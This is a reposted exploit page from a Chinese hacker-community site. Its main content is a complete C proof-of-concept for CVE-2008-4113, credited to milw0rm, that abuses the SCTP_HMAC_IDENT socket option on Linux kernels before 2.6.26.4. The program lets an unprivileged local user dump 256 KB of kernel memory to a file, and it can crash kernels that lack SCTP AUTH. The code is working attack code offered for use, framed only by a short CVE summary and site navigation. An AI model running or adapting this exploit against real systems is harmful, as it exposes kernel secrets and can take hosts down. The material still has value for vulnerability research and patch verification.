Linux Kernel < 2.6.26.4 SCTP Kernel Memory Disclosure Exploit - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

服务导航

我要发布

主力频道

精华收集

光盘刻录

您现在的位置：华夏黑客同盟 >> 漏洞 >> 本地 >> 正文

用户登录

新用户注册

协议内核内存泄露漏洞

荐 ★★★

【字体：小大】

Linux Kernel < 2.6.26.4 SCTP Kernel Memory Disclosure Exploit

作者：milw0rm 文章来源：milw0rm 点击数：更新时间：2009-1-6

/*
* cve-2008-4113.c
*
* Linux Kernel < 2.6.26.4 SCTP kernel memory disclosure
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
*   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113
*
*   The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream
*   Control Transmission Protocol (sctp) implementation in the Linux kernel
*   before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an
*   untrusted length value to limit copying of data from kernel memory, which
*   allows local users to obtain sensitive information via a crafted
*   SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function.
*
* Notes:
*
*   If SCTP AUTH is enabled (net.sctp.auth_enable = 1), this exploit allow an
*   unprivileged user to dump an arbitrary amount (DUMP_SIZE) of kernel memory
*   out to a file (DUMP_FILE). If SCTP AUTH is not enabled, the exploit will
*   trigger a kernel OOPS.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>

#ifndef SCTP_HMAC_IDENT
#define SCTP_HMAC_IDENT 22
#endif

#define DUMP_SIZE 256*1024
#define DUMP_FILE "mem.dump"

int
main(int argc, char **argv)
{
int ret, sock;
FILE *dumpfile;
char *memdump, *err;
socklen_t memlen = DUMP_SIZE;

memdump = malloc(DUMP_SIZE);
if (!memdump) {
err = "malloc(3) failed";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
memset(memdump, 0, DUMP_SIZE);

printf("[+] creating IPPROTO_SCTP socket\n");

sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
if (sock == -1) {
err = "socket(2) failed";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}

printf("[+] getting socket option SCTP_HMAC_IDENT with length of %d\n", memlen);

ret = getsockopt(sock, SOL_SCTP, SCTP_HMAC_IDENT, memdump, &memlen);
if (ret == -1) {
err = "getsockopt(2) failed";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}

printf("[+] dumping %d bytes of kernel memory to %s\n", memlen, DUMP_FILE);

dumpfile = fopen(DUMP_FILE, "wb");
if (!dumpfile) {
err = "fopen(3) failed";
printf("[-] Error: %s (%s)\n", err, strerror(errno));
return 1;
}
fwrite(memdump, 1, memlen, dumpfile);
fclose(dumpfile);

printf("[+] done.\n");

return 0;
}

// milw0rm.com

责任编辑：朱倩　　联系方式　Email：朱倩

电话：51228163

上一篇漏洞： IntelliTamper堆栈溢出漏洞

下一篇漏洞：播放器本地堆栈溢出漏洞

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913